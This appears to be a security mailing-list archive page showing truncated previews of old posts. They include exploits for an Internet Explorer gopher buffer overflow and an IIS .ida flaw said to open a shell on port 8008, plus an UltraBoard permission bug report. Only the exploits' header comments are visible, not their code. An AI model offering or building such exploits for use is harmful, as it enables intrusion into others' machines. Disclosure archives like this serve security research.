In-Reply-To: <[EMAIL PROTECTED]>
>
>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
>those %u directives get translated into question marks. (0x003F in hex)
>:<
I tested it only on Korean version of Windows(Server and Professional
edition).
>
>This exploit must be much e
Updated version of eat gopher...
with minor fix...
visit http://monkey.org/~mat for latest verrsion..
#!/usr/bin/perl
#
# [EMAIL PROTECTED]
# 2002.7.27
# IE gopher buffer overflow exploit
# only tested with my W2k Korean and Wme Korean windows OS...
# you maybe have to change some addresses with
Sorry previous one is wrong with some code.
#!/bin/sh
# .ida nasty exploit
# [EMAIL PROTECTED],[EMAIL PROTECTED]
# http://monkey.org/~mat
#
# If this exploit succeeds, you can get into the machine through port 8008
# shellcode generated by DeepZone generator
# I only tested this code under W2k K
Simple .ida exploit method and POC code.
so simple and nasty, use at your own risk!
#!/bin/sh
# .ida nasty exploit
# [EMAIL PROTECTED],[EMAIL PROTECTED]
# http://monkey.org/~mat
#
# If this exploit succeeds, you can get into the machine through port 8008
# shellcode generated by DeepZone genera
Hacksware Bug Report
1. Name: UltraBoard cgi directory permission problem
2. Release Date: 2001.1.12
3. Affected Application:
UltraBoard 2000 Personal Edition
Version 2.11
http://www.ub2k.com/downloads/UB211PEB1.zip
4. Author: [EMAIL PROTECTED]
5. Type: Configuration Error
6. Explanation
I